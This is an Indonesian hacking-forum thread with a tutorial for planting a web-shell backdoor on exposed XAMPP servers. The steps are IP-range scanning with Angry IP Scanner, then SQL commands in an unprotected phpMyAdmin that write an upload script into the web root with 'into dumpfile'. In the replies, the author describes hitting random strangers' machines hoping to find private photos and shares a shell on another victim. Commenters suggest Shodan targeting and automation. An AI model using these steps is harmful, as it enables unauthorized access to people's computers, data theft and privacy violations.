Share Inject Backdoor via PhpMyAdmin - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Web Attack (https://www.indonesianbacktrack.or.id/forum/forum-181.html) +--- Thread: Share Inject Backdoor via PhpMyAdmin (/thread-6575.html) |
Inject Backdoor via PhpMyAdmin - x_code - 11-11-2015 Selamat malam all member IBT, berawal dari praktek tutorial di trheadnya kang @sonyrimawan di http://www.indonesianbacktrack.or.id/forum/thread-5981.html yang hasilnya g menyenangkan bagi ane ( karna ane gagal ) upload failed mulu .... Ane brangkat ke warung ngutang rokok ama kopi buat temen begindang ... eh begadang maksudnya .... Yang membuat ane penasara , toh udah masuk ke phpmyadmin masa g bisa ngapa2en ... :3 ( waktu itu ane merasa sedih ) Ane siapin peralatan tempur, berbekalkan sedikit pengetahuan dari install cms di localhost ane bulatkan tekat untuk BISA ... Peralatan tambahan yang ane gunain : Angry Ip Scanner Sedikit Script Shell Backdoor (Disini ane menggunkana shell 3CArmy) Oke .... pertama kita cari dulu targetnya menggunakan Anggry Ip Scanner : Set Anggry Ip Scannernya seperti gambar di bawah ini : Menu tools >>> Preferences >> Pada tab port tambahkan port yg akan kita scan berhubung server pada localhost biasanya menggunakan port 80 / 8080 maka settingan punya ane ane buat begindang Spoiler! :
kemudian pada tab display pilih yang host with open port only Spoiler! :
selanjutnya balik lagi pada menu tool >>> Fetchers Pindahkan web detect ke sebelah kiri seperti di gambar Spoiler! :
kemudian scan dan cari yg seperti ini : Spoiler! :
yap .. yang port apachenya open tentunya , karna dari situlah kita masuk NB : Tidak semua juga yang bisa , ada yg phpmyadminnya d password , ada yg memang hanya bisa di akses dari localhost/pc korban itu sendiri ( xampp terbaru kalo g salah ) setelah mendapatkan target, buka ip target tersebut di web browser, maka kita akan masuk ke halaman awal web servernya ( xampp, appserv, etc ) Spoiler! :
oke , disini kita mulai bermain dengan comand sql nya ... pertama kita buat database baru untuk tempat backdoor yang akan kita masukkan Quote:create database userform Spoiler! :
Kemudian kita buat tabel dan collumnya dengan cara klik pada database yang sudah kita buat kemudian pilih SQL dan masukkan comand : Quote:CREATE TABLE `userform`.`user` ( klik Go NB: userform = nama database , user = nama tabel , form = nama column ( silahkan buat sesuka anda ), longtext = jenis data ( ane buat longtext karna script uploadnya lumayan panjang) selanjutnya kita cek basedir nya dimana dengan comand : Quote:select @@datadir pada contoh ini ada di C:\xampp\mysql\data\ Spoiler! :
artinya target menggunkan xampp , dan dir xampp biasanya di : C:/xampp/htdocs oke .. selanjutnya masih di tabel user, klik SQL dan masukkan script di bawah ini : Quote:INSERT INTO `userform`.`user` ( itu adalah script buat ngupload file backdoor kita nantinya ... jika sukses maka akan muncul seperti ini : Spoiler! :
Next Step masih di tabel user, buka lagi comand SQL dan masukkan comand : Quote:select * into dumpfile 'C:/xampp/htdocs/upload.php' from user NB: C:/xampp/htdocs/ = dir xampp ( karna korban menggunakan xampp pada tutorial ini ) upload.php = nama file untuk script upload yg kita masukkan tadi pada langkah sebelumnya from user = from (nama tabel) Kemudian klik Go coba buka urlnya : victimip/upload.php terahir silahkan upload shell anda , untuk akses shell : victimip/namashell.php Maaf untuk beberapa step terahir g ada gambarnya dikarnakan target ane udah offline . jadi hal ini hanya bisa dilakukan selama target online dan menjalankan server apachenya... Jika ada yang kurang jelas monggo tanyain .... Tutorial Created by Black-Ink ... Salam RE: Inject Backdoor via PhpMyAdmin - hehehe - 11-11-2015 nice thread bro... btw targetnya kenapa offline bro, aturan dikasih link2 bagus dulu ke target biar onlinenya lama.. hehehe... pokoknya mantab buat threat ente bro.. RE: Inject Backdoor via PhpMyAdmin - x_code - 11-11-2015 kagak tau ane knape die offline ... wong kenal juga kagak ama targetnye :v kan nyari target via scanning range IP doangan kang , jadi kalo hoki nemu laptop cewe kan siape tau ada foto anu anu nya :v #SEGALA BENTUK PENYALAHGUNAAN DARI TUTORIAL INI DILUAR TANGGUNG JAWAB ANE :V RE: Inject Backdoor via PhpMyAdmin - x_code - 11-11-2015 nyah tampilan webshell ane di target yg lain : http://s15.postimg.org/hr7pcguzv/Screenshot_from_2015_11_11_00_24_16.png tinggal ubek2 smua drivenya kali aja nemu sesuatu :v RE: Inject Backdoor via PhpMyAdmin - hehehe - 11-11-2015 ane penasaran sama file atta Vs Okta.mp4 itu bro :v RE: Inject Backdoor via PhpMyAdmin - djoe - 11-11-2015 mungkin bisa ditambahin lagi , untuk bisa upload shell via php myadmin , seorang attacker harus mempunyai root privilagenya , sehingga berhasil upload shellnya nice share om salam kenal RE: Inject Backdoor via PhpMyAdmin - ariyolo - 11-11-2015 nice thread, ke depannya bikin artikel lagi yahh... soalnya ane masih perlu banyak belajar untuk ningkatin sikil RE: Inject Backdoor via PhpMyAdmin - orang sederhana - 11-11-2015 nah kalo kita target nya IP Public gimana om? harus cari range IP nya juga atau gimana nih om @x_code RE: Inject Backdoor via PhpMyAdmin - cyberly - 11-11-2015 WOw... asik nih buat pelajarn baru... RE: Inject Backdoor via PhpMyAdmin - Tu5b0l3d - 11-11-2015 mantab bng.. cari targetnya bisa pake shodan.. http://www.indonesianbacktrack.or.id/forum/thread-6464-post-61269.html ini autonya... rencananya ane pengen buat auto nanem shell in phpmyadmin |